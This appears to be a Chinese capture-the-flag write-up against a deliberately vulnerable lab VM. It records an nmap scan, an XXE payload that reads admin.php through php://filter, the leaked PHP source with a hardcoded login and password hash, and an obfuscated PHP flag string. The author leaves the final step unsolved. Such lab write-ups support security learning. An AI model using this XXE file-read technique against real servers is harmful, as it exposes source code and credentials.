ifconfig
nmap 192.168.61.0/24
找到192.168.61.145
目录扫描(御剑)
192.168.61.145/xxe
192.168.61.145/admin.php
无法访问,但是robots.txt里面写的应该不会是无效网站,所以可能是被拒绝访问了
抓xxe的包
可以发现是用xml写的,试一下有没有漏洞
这里用php://filter而不用 file:// 是因为php://filter可以直接跟相对路径,而 file:// 要跟绝对路径
在192.168.61.145这个页面下,xxe和 admin.php是知道的,但是绝对路径不知道
- "1.0" encoding="UTF-8"?>
- ANY [
- test SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">
- ]>
- <root><name>&test;name><password>1password>root>
解码
- <?php
- session_start();
- ?>
-
-
- <html lang = "en">
-
- <head>
- <title>admin</title>
- <link href = "css/bootstrap.min.css" rel = "stylesheet">
-
- <style>
- body {
- padding-top: 40px;
- padding-bottom: 40px;
- background-color: #ADABAB;
- }
-
- .form-signin {
- max-width: 330px;
- padding: 15px;
- margin: 0 auto;
- color: #017572;
- }
-
- .form-signin .form-signin-heading,
- .form-signin .checkbox {
- margin-bottom: 10px;
- }
-
- .form-signin .checkbox {
- font-weight: normal;
- }
-
- .form-signin .form-control {
- position: relative;
- height: auto;
- -webkit-box-sizing: border-box;
- -moz-box-sizing: border-box;
- box-sizing: border-box;
- padding: 10px;
- font-size: 16px;
- }
-
- .form-signin .form-control:focus {
- z-index: 2;
- }
-
- .form-signin input[type="email"] {
- margin-bottom: -1px;
- border-bottom-right-radius: 0;
- border-bottom-left-radius: 0;
- border-color:#017572;
- }
-
- .form-signin input[type="password"] {
- margin-bottom: 10px;
- border-top-left-radius: 0;
- border-top-right-radius: 0;
- border-color:#017572;
- }
-
- h2{
- text-align: center;
- color: #017572;
- }
- </style>
-
- </head>
-
- <body>
-
- <h2>Enter Username and Password</h2>
- <div class = "container form-signin">
-
- <?php
- $msg = '';
- if (isset($_POST['login']) && !empty($_POST['username'])
- && !empty($_POST['password'])) {
-
- if ($_POST['username'] == 'administhebest' &&
- md5($_POST['password']) == 'e6e061838856bf47e1de730719fb2609') {
- $_SESSION['valid'] = true;
- $_SESSION['timeout'] = time();
- $_SESSION['username'] = 'administhebest';
-
- echo "You have entered valid use name and password
"; - $flag = "Here is the Flag";
- echo $flag;
- }else {
- $msg = 'Maybe Later';
- }
- }
- ?>
- </div> <!-- W00t/W00t -->
-
- <div class = "container">
-
- <form class = "form-signin" role = "form"
- action = "
- ?>" method = "post">
- <h4 class = "form-signin-heading"><?php echo $msg; ?></h4>
- <input type = "text" class = "form-control"
- name = "username"
- required autofocus></br>
- <input type = "password" class = "form-control"
- name = "password" required>
- <button class = "btn btn-lg btn-primary btn-block" type = "submit"
- name = "login">Login</button>
- </form>
-
- Click here to clean <a href = "adminlog.php" tite = "Logout">Session.
-
- </div>
-
- </body>
- </html>
账号密码都出来了
administhebest
admin@123
错了,试了几遍都没用,看来要找别的路
继续看代码,可以看到这个,这也是账号密码正确后会进行的东西
查看 flagmeout.php 的源代码
base64解密
- $flag = "";
- echo $flag;
- ?>
目测base32解密
再解密
还有
$_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$À=+_;$Á=$Â=$Ã=$Ä=$Æ=$È=$É=$Ê=$Ë=++$Á[];$Â++;$Ã++;$Ã++;$Ä++;$Ä++;$Ä++;$Æ++;$Æ++;$Æ++;$Æ++;$È++;$È++;$È++;$È++;$È++;$É++;$É++;$É++;$É++;$É++;$É++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$__('$_="'.$___.$Á.$Â.$Ã.$___.$Á.$À.$Á.$___.$Á.$À.$È.$___.$Á.$À.$Ã.$___.$Á.$Â.$Ã.$___.$Á.$Â.$À.$___.$Á.$É.$Ã.$___.$Á.$É.$À.$___.$Á.$É.$À.$___.$Á.$Ä.$Æ.$___.$Á.$Ã.$É.$___.$Á.$Æ.$Á.$___.$Á.$È.$Ã.$___.$Á.$Ã.$É.$___.$Á.$È.$Ã.$___.$Á.$Æ.$É.$___.$Á.$Ã.$É.$___.$Á.$Ä.$Æ.$___.$Á.$Ä.$Á.$___.$Á.$È.$Ã.$___.$Á.$É.$Á.$___.$Á.$É.$Æ.'"');$__($_);
emm,看着有点像php,卡了,忘记可以运行代码了
不知道为什么会错,按理说这里应该就结束了